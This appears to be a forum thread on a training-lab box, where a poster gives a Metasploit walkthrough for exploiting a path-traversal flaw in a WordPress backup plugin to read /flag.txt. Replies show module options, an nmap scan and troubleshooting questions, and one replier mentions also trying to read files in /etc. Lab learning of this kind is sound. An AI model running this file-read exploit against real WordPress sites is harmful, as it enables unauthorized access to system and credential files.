Hello, its x69h4ck3r, i am gonna make this straight forward as possible,
cos you ma have spent hours on this.
Ok!, lets jump into it.
Step 1: Search for the plugin exploit on the web.
example; search on google.com like this; “Backup Plugin 2.7.10 for WordPress exploit”
when done, you will get lots of result.
pick the one with rapid7, its short…
in rapid7 the metasploit exploit for this vulnerability
is shown; “wp_simple_backup_file_read”.
we then go in our terminal and fire up the metasploit framework
in other to use this exploit on our target server.
Step 2: Fire up the metasploit DataBase.
this command in your terminal to start up the postgresl db
systemctl start postgresql
this command to run the metasploit
msfconsole
search for the exploit using this command
search exploit wordpress plugin backup
locate “wp_simple_backup_file_read” and use the command bellow
use auxiliary/scanner/http/wp_simple_backup_file_read
when in the command, type “show options”
change the rhosts to the target_ip;
change rport to the target_port
change filepath to /flag.txt
press enter, cross-check your parameters by using the “show options” command
once satisfied, type the “run or exploit” command to get the exploit working,
and the flag will be downloaded into the .msf4/loot/ folder
you can use "locate /.msf4/loot/ " to locate and pivot into the directory
and then read the file with the “cat” command…
i hope this was useful… please like and comment, let me know if this solved your problem.
When I do this, nothing downloads into the loot folder. It just says:
msf6 auxiliary(scanner/http/wp_simple_backup_file_read) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Here are my options for reference:
msf6 auxiliary(scanner/http/wp_simple_backup_file_read) > options
Module options (auxiliary/scanner/http/wp_simple_backup_file_read):
Name Current Setting Required Description
---- --------------- -------- -----------
DEPTH 6 yes Traversal Depth (to reach the root folder)
FILEPATH /flag.txt yes The path to the file to read
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 142.93.47.26 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 30633 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
What do you think? What am I doing wrong? Is there something wrong with the box?
for the record, I also tried it with just “flag.txt” (no quotes) as the filepath… and a lot of other things, including a bunch of stuff you’d expect to see in /etc
For a minute I took got confused when I didn’t see the msf output. Later I realized I forgot to set the RPORT associated to the target IP. Once I did I got the output.
Two questions: 1). The nmap of my Target Instance is as follows:
nmap -sV -A -p<Target Instance Port #> <Target Instance IP address without Port #>
PORT STATE SERVICE VERSION
<Target Instance Port #>/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.6.1
|_http-title: Getting Started – Just another WordPress site
|_http-server-header: Apache/2.4.41 (Ubuntu)
How should we know to target the WordPress application and not Apache 2.4.41?
2). How would we know (aside from the tip) to use a ‘plugin’ type of attack against the WordPress application?
